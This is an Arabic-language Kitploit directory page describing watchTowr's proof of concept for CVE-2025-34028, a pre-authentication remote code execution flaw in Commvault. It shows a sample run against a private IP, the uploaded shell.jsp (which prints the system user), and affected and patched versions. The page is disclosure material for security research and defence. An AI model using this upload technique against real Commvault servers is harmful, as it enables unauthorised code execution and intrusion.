Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028 — استغلال إثبات المفهوم لـ CVE-2025-34028، يُظهر تنفيذًا عن بُعد للكود قبل المصادقة على واجهات الويب الخاصة بـ Commvault عبر رفع JSP خبيث. | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-commvault-preauth-rce-cve-2025-34028
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubwatchtowrlabs/watchtowr-vs-commvault-preauth-rce-cve-2025-34028

watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028

استغلال إثبات المفهوم لـ CVE-2025-34028، يُظهر تنفيذًا عن بُعد للكود قبل المصادقة على واجهات الويب الخاصة بـ Commvault عبر رفع JSP خبيث.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
219منذ سنة واحدةتمت المراجعة من قبل Kitploit

CVE-2025-34028

إثبات مفهوم لتنفيذ تعليمات برمجية عن بُعد بدون مصادقة مسبقة في Commvault

اطلع على منشور مدونتنا للحصول على التفاصيل التقنية

الكشف في العمل

root@kitploit:~
 python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchtowr-vs-commvault-rce-CVE-2025-34028.py
        (*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-34028]
        
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to  /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from  https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$

الوصف

هذا البرنامج النصي هو إثبات مفهوم لـ CVE-2025-34028، لواجهات الويب الخاصة بـ Commvault. من خلال رفع ملف مضغوط (zip) يحتوي على ملف .jsp لتنفيذ التعليمات البرمجية، يتم رفع الملف المضغوط إلى دليل عام ويتم تفصيل المستخدم النظامي داخل الاستجابة. تم توضيح المزيد من التفاصيل في [منشور مدونتنا] (https://labs.watchtowr.com/).

ملاحظة

يستخدم البرنامج النصي للإثبات ملفًا مضغوطًا ثابتًا يحتوي على الملفات التالية:

  • /ccApp/index.html
  • shell.jsp

محتويات Shell.jsp:

root@kitploit:~
<%@ page import="java.util.*" %>
<html>
<body>
  <h3>System Information</h3>
  <p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>

الإصدارات المتأثرة

  • Commvault على Windows و Linux 11.38.0 - 11.38.19

الإصدارات المعالجة

  • Commvault على Windows و Linux 11.38.20 اعتبارًا من 10 أبريل 2025
  • Commvault على Windows و Linux 11.38.25 اعتبارًا من 10 أبريل 2025

لمزيد من التفاصيل، راجع تنبيه Commvault

تابع watchTowr Labs

لأحدث الأبحاث الأمنية، تابع فريق watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة